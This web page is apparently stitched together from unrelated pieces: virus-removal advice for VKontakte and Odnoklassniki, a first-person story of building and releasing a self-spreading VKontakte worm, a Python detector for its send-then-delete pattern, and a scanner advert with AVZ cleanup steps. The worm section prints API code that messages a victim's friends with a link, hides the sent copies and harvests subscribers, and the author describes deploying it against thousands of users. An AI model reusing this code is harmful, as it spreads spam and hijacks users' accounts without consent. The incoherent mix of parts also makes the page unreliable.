Remove VKontakte and Odnoklassniki virus from your computer


The essence of the problem

Most likely, there is a “Trojan” on your PC whose purpose is to extract money from naive users. This is what a pseudo-blocking page might look like:

VKontakte social network blocking window

Common situation?

I would like to note right away that there is no need to send any SMS. The solution to the problem is completely free. You will soon see this for yourself.

Virus for VKontakte


Another day I sat in front of the computer and didn’t know what to do. Scrolling through my feed, I already returned to yesterday’s posts that I had already seen. When I went to my page I thought to myself: “God, only 160 subscribers. How little is this..." And the question immediately arose: “How to increase them?” It’s clear that cheating will come to everyone’s mind. But this required either money, or spending a lot of time subscribing, reposting or liking whatever - this was not an option.

Later, before going to bed, an idea came to me on how to do this. The idea was a viral link that almost all Internet users would receive. Waking up in the morning and drinking coffee, I began to implement this idea. It has long been no secret to many that in order to perform requests on behalf of a user in the VK API, you need to have its access_token. But! The site itself does not require this key just to test it. Before starting to create this Super Virus, I just wanted to check its functionality.

For the test, I used the friends.add method and entered my id in the user_id field.
After performing this action, the address bar will change to something like this:

https://vk.com/dev/friends.add?params[user_id]=id

I shortened this link via vk.cc and left it in the comments to two popular groups with a tempting description. Half an hour later I already had 100 subscribers (there would have been more, but my comment was deleted and I was banned). After that, I became confident that it would work and started creating it.

VKontakte limits access to the API from one IP to an interval of 5 seconds so that the server does not overload. And to solve the problem with frequent requests, they created the execute method. This method allows you to call several methods simultaneously while saving the algorithm, which is what I used.

This virus mainly relies on the gullibility of people, in two words - “social engineering”. Each of us will probably click on the link in a message from his friend - this is exactly what I wanted to enslave the world to take advantage of.

It took me about a day to create the virus, as I encountered a couple of obstacles. More on this later. The virus was supposed to work like this:

  1. The user followed the link
  2. The method gets a list of all friends and sorts them by rating
  3. Sends a message with the text “See /* link */”
  4. The message is deleted from the sender
  5. Adds as a friend and/or subscribes to the specified groups
  6. Friends who received the message follow the link
  7. Everything starts over from the beginning

And this is actually what this code looks like in the method:

    var a = API.friends.get({ // Method for getting a list of all friends
        "order": "hints" // Parameter for sorting by rating
    }).items; // Get only the list
    var b = 0; // Variable for the loop
    var d = 0; // Variable for message id
    while ( a ){
        d = API.messages.send({ // Method for sending a message. Returns message id
            "user_id": a , // recipient
            "message": "See /* link */ " // Message text
        });
        API.messages.delete({ // Delete a message by its id
            "message_ids": d
        });
        b = b + 1; //Increase b by 1 (++b or b++ does not work)
    }
    API.friends.add({
        "user_id": "my id"
    });

Having received the link, I happily went to test it on my fake profile. But no such luck. After clicking on the link, I received error 12: Syntax error. The & character was not expected. This is where my obstacles began. As it turns out, the XML protection server translates all characters. And the double quotation mark " was simply translated into &quotes; and the console gave an error. Single quotes are not translated, but it will not accept them, since the syntax is from JSON.

Since this is my first attempt at working with a vulnerability (like this post), it took me a little longer. The first five hours were spent understanding that keys can be transferred without quotes, and it is not necessary to write numbers in quotes either. That is, you can do this:

    API.friends.add({ user_id: 1234567 });

Okay, half the problem was solved. There was only one problem left: I needed to figure out how to pass the message text and the word “hints” for sorting.

For reference! Why was it necessary to pass the hints parameter?

The fact is that even on the method test page, if there is a suspicious request (for example, sending a message from 3 or 7), you are required to enter a captcha.
It is not a fact that the message will be sent to the right person. Therefore, passing this parameter will sort the list so that the first three from the list are 90% more likely to follow the link.

To solve the last problem I thought of using regular expressions or something like that to replace the number 0 into a string.
I myself am just a beginner web developer and didn’t know how to do this, so I asked the question on Toster. Having received two answers I needed with different solutions, I immediately decided to use them. And here again the problem... The VKontakte API is not JavaScript and does not support its functions like replace() or toString(). And in general it does not support anything from JS, except var, return, while, if, else, arrays and comparison operators.

I again found myself at a dead end and did not know what to do. I told my fellow programmers about this, asking for help. With the words “This is just brilliant, dude!” they decided to help me and went to dig into the API documentation.

It took me a long time to figure out how to solve this problem. It got late and I went to bed. Before going to bed, I was again struck by a great idea to solve this problem.

It's morning again. After drinking my dose of morning coffee, the first thing I did was start continuing my virus. The solution was quite simple. After all, when passing numbers or variables from methods, it is not necessary to write them in quotes.

I needed my fake profile. There I made two different posts with the following texts:

  • See /* link */
  • hints

All I needed was to get these records and write them into variables, which is what I did. As a result, I ended up with the following code:

    var b = 0; // Variable for the loop
    var d = 0; // Variable for message id
    var m = API.wall.get({
        owner_id: id, // fake page id
        count: 1 // return only 1 post
    }).items[0].text; // get only the text of the article
    var h = API.wall.get({
        owner_id: id, // id of the fake page
        count: 1, // return only 1 post
        offset: 1 // shift posts by 1
    }).items[0].text; // get only the text of the article
    var a = API.friends.get({ // Method for getting a list of all friends
        order: h // Parameter for sorting by rating
    }).items; // Get only the list
    while ( a ){
        d = API.messages.send({ // Method for sending a message. Returns message id
            user_id: a , // recipient
            message: m // message text
        });
        API.messages.delete({ // Delete a message by its id
            message_ids: d
        });
        b = b + 1; //Increase b by 1 (++b or b++ does not work)
    }
    API.friends.add({ "user_id": "my id" });

Having received the link, I checked it to see if it works and - hurray! Everything worked as it should. A friend request was sent from a fake page and messages were successfully sent to the first 7 friends from the rating. Having compressed the link and put it on the first post, I prepared for the Big Boom with a satisfied smile! To also know how many people followed the link, I compressed the link to a php file on my hosting, which recorded the visit in the database, and redirected to the method with the code.

For intrigue, I did not refresh the page every time, but simply left VK immediately after one comment. I returned about an hour later and, looking at the number of entries in the database, felt a surge of happiness. The joy knew no bounds! More than 5000 transitions. “And this in just an hour! What will happen in two?” - I asked myself a question. After all, this was my first experience in hacking.

Deciding to see how much had accumulated on the page personally, I went to the site and saw as many as 3 new subscribers! Can't say I wasn't surprised. I didn’t understand anything... There were more than 5000 lines in the database, where almost everyone had an individual IP, and only 3 subscribers. I began to think that I was actually not as smart as I thought I was 2 minutes ago, and that VK already has protection against such frauds. With such thoughts I left to be sad.

It's been 2 days already. Before going to bed, I decided to check my website. I looked into the database and, out of curiosity, looked at the table for recording statistics. There have already been more than 25,000 visits via the viral link, and there are fewer subscribers, because those who were a test for me at the beginning also unsubscribed.

Again before going to bed, I finally understood why there were no new subscribers, and the number of clicks was growing (someone, write a post about why decisions come before bed? Otherwise, I’ll write it myself). It was all in the code. The execute method executes the code, saving the algorithm, and the add friend method was at the very end. It did not work because further methods were not executed until the captcha was entered. Because all my “victims” had more than 8 friends, naturally the captcha was triggered, and users, suspecting something, simply closed the tab. The recording was saved, messages were transmitted, but there were no more slaves for subscribers.

Immediately jumping out of bed, I decided to fix this quickly, so that by the morning there would already be more than ten thousand subscribers. After making changes to the redirection php file, I went to bed with happy thoughts about tomorrow.

Morning comes and I check my profile without even drinking my coffee. Hooray! There were fewer subscribers... I was again extremely surprised. It should still work. This time I decided to check the functionality of the link on a real profile. Having deleted the code to delete the message, I followed the generated link. It turns out that the developers have already closed this vulnerability. The code in the address bar for the transition no longer worked.

I don’t know how they figured it out themselves. I'm a genius here! Either the message reached them, or one of the programmers I knew secretly told about the vulnerability, whatever it is, I will never know about it.

I was still happy, because for the first time I was able to find a vulnerability in a large network. It may be normal for others, but for me it was something special.
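
The send-then-delete behaviour from steps 2-4 of the list above leaves a recognisable trace on the platform side. The following is an added detection sketch, not code from the original article or from VK: it flags accounts that send one identical text to several friends and wipe each copy from their own side within seconds. The log format, field names and thresholds are assumptions, and the sample lines are constructed.

```python
import json
from collections import defaultdict

# Constructed audit-log lines; the JSON field names are assumptions for this example.
SAMPLE_LOG = """
{"ts": 100.0, "uid": 11, "method": "messages.send", "peer": 21, "text": "See https://short.example/x", "msg_id": 501}
{"ts": 100.2, "uid": 11, "method": "messages.delete", "msg_ids": [501]}
{"ts": 100.5, "uid": 11, "method": "messages.send", "peer": 22, "text": "See https://short.example/x", "msg_id": 502}
{"ts": 100.7, "uid": 11, "method": "messages.delete", "msg_ids": [502]}
{"ts": 101.0, "uid": 11, "method": "messages.send", "peer": 23, "text": "See https://short.example/x", "msg_id": 503}
{"ts": 101.2, "uid": 11, "method": "messages.delete", "msg_ids": [503]}
{"ts": 101.5, "uid": 11, "method": "friends.add", "user_id": 999}
{"ts": 200.0, "uid": 12, "method": "messages.send", "peer": 31, "text": "Party on Friday?", "msg_id": 601}
{"ts": 205.0, "uid": 12, "method": "messages.send", "peer": 32, "text": "Party on Friday?", "msg_id": 602}
{"ts": 210.0, "uid": 12, "method": "messages.send", "peer": 33, "text": "Party on Friday?", "msg_id": 603}
{"ts": 300.0, "uid": 13, "method": "messages.send", "peer": 41, "text": "hi", "msg_id": 701}
{"ts": 301.0, "uid": 13, "method": "messages.delete", "msg_ids": [701]}
""".strip().splitlines()

def find_send_delete_bursts(lines, window=30.0, min_recipients=3):
    """Return {uid: text} for accounts that sent one identical text to several
    peers and deleted every copy from their own side within `window` seconds."""
    sends = defaultdict(list)    # (uid, text) -> [(ts, peer, msg_id)]
    deleted = defaultdict(dict)  # uid -> {msg_id: ts of first deletion}
    for line in lines:
        ev = json.loads(line)
        if ev["method"] == "messages.send":
            sends[(ev["uid"], ev["text"])].append((ev["ts"], ev["peer"], ev["msg_id"]))
        elif ev["method"] == "messages.delete":
            for mid in ev["msg_ids"]:
                deleted[ev["uid"]].setdefault(mid, ev["ts"])
    flagged = {}
    for (uid, text), events in sends.items():
        events.sort()
        # Keep only sends whose own copy was deleted by the sender shortly afterwards.
        wiped = [(ts, peer) for ts, peer, mid in events
                 if mid in deleted[uid] and 0 <= deleted[uid][mid] - ts <= window]
        start = 0
        for end in range(len(wiped)):  # sliding time window over the wiped sends
            while wiped[end][0] - wiped[start][0] > window:
                start += 1
            if len({peer for _, peer in wiped[start:end + 1]}) >= min_recipients:
                flagged[uid] = text
                break
    return flagged
```

On the constructed log only account 11 is flagged: account 12 sends the same text to three friends but keeps its copies, and account 13 deletes a single message.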

VKontakte Antivirus (Cezurity Scanner)

Cloud service for checking and treating your computer. Cezurity Anti-Virus Scanner will check your computer for free for malware - viruses, Trojans, spyware, rootkits (hidden programs). In case of infection, the anti-virus scanner will cure your computer.

  • A quick check will only take a few minutes.
  • The scanner will help detect and neutralize threats missed by other antiviruses.
  • Compatible with other installed antiviruses.
  • It is easy and quick to install and does not require constant updates of anti-virus databases.

The download menu looks like launching a regular application on a social network:

After clicking on the “Install Scanner” button, you should see a window that offers installation options. In the first case the program is installed with the recommended settings, and in the second case you can disable actions that you do not need. Make your choice and click the “accept and install” button.

Now we see a proposal to save the file.

After saving, run the file and the installation of “VKontakte antivirus” begins.

And at the end the main menu of the program opens in front of you.

This application is not the main protection of your computer from viruses - it is only a professional tool for protecting a VK page. I repeat once again, it is not a general antivirus for the entire system.

Additional unlocking of VK account

If it doesn’t work and you are still blocked on VKontakte, then we’ll try to act on a larger scale, namely:

  1. Launch AVZ (if you don’t have it, then you probably haven’t read everything described above). We unpack the archive with it somewhere convenient for you;
  2. Run avz.exe in the folder where you unpacked it;
  3. In the program window “File” – “System Restore”. In the window that appears, check off items 6, 8, 9, 13, 14, 15 and 20, 21 (20 and 21 may not be present in the old version of AVZ - then without them). Next, click “Perform selected operations”;
  4. Once completed, close AVZ and DO NOT open the Internet for now;
  5. Next we do: Start - run - cmd - ok. In the console that appears, write: ipconfig /flushdns
  6. Press enter. Then enter: route -f
  7. Press enter

Restart your computer, connect to the Internet, and try logging in. If it doesn’t help, then use the articles here: “Cleaning the registry, temporary files and “traces” after uninstalling programs” and here: “How to quickly remove viruses. Part 5”.
